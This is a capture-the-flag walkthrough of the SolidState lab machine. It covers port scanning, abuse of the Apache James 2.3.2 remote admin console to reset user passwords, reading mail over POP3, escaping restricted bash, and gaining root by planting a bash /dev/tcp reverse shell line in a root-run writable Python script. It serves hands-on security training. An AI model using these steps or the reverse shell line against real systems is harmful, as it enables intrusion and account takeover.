1 minute read

SolidState

Reconnaissance

IP: 10.10.10.51

NMAP

nmap -T4 -p- -A 10.10.10.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-30 08:33 UTC
Nmap scan report for 10.10.10.51
Host is up (0.031s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.8 [10.10.14.8])
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.13 - 4.4
Network Distance: 2 hops
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   29.41 ms 10.10.14.1
2   30.06 ms 10.10.10.51

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.66 seconds

Website

Site

I can’t spot anything usefull on site so I switched searching for mail service

Apache James Server 2.3.2

JAMES smtpd 2.3.2. I found article: https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf

so lets try this

telnet 10.10.10.51 4555

I change all users passwords to root to faster enumeration:

Now let’s check their mailboxes via POP3 (port 110). While login with mindy credentials I found juicy email with username and password for ssh login

telnet 10.10.10.51 110
USER mindy
PASS root
LIST
RETR 1
RETR 2

Now let’s login via ssh with mindy: P@55W0rd1!2@ Restricted bash :/

Escaping Restricted Bash (rBash)

Via ssh it is great to start with -t bash which execute bash on connect

ssh mindy@10.10.10.51 -t bash

Privilege escalation

I run linpeas and found 2 good places to start localport on 631 and python script with 777 own by root

First I added revshell to script

os.system('bash -c "bash -i >& /dev/tcp/10.10.14.47/443 0>&1"')

And that was quick :) I got reverse shell as root

Now we can grab root.txt

If we want confirm that root run this process every few minutes we can run pspy

./pspy32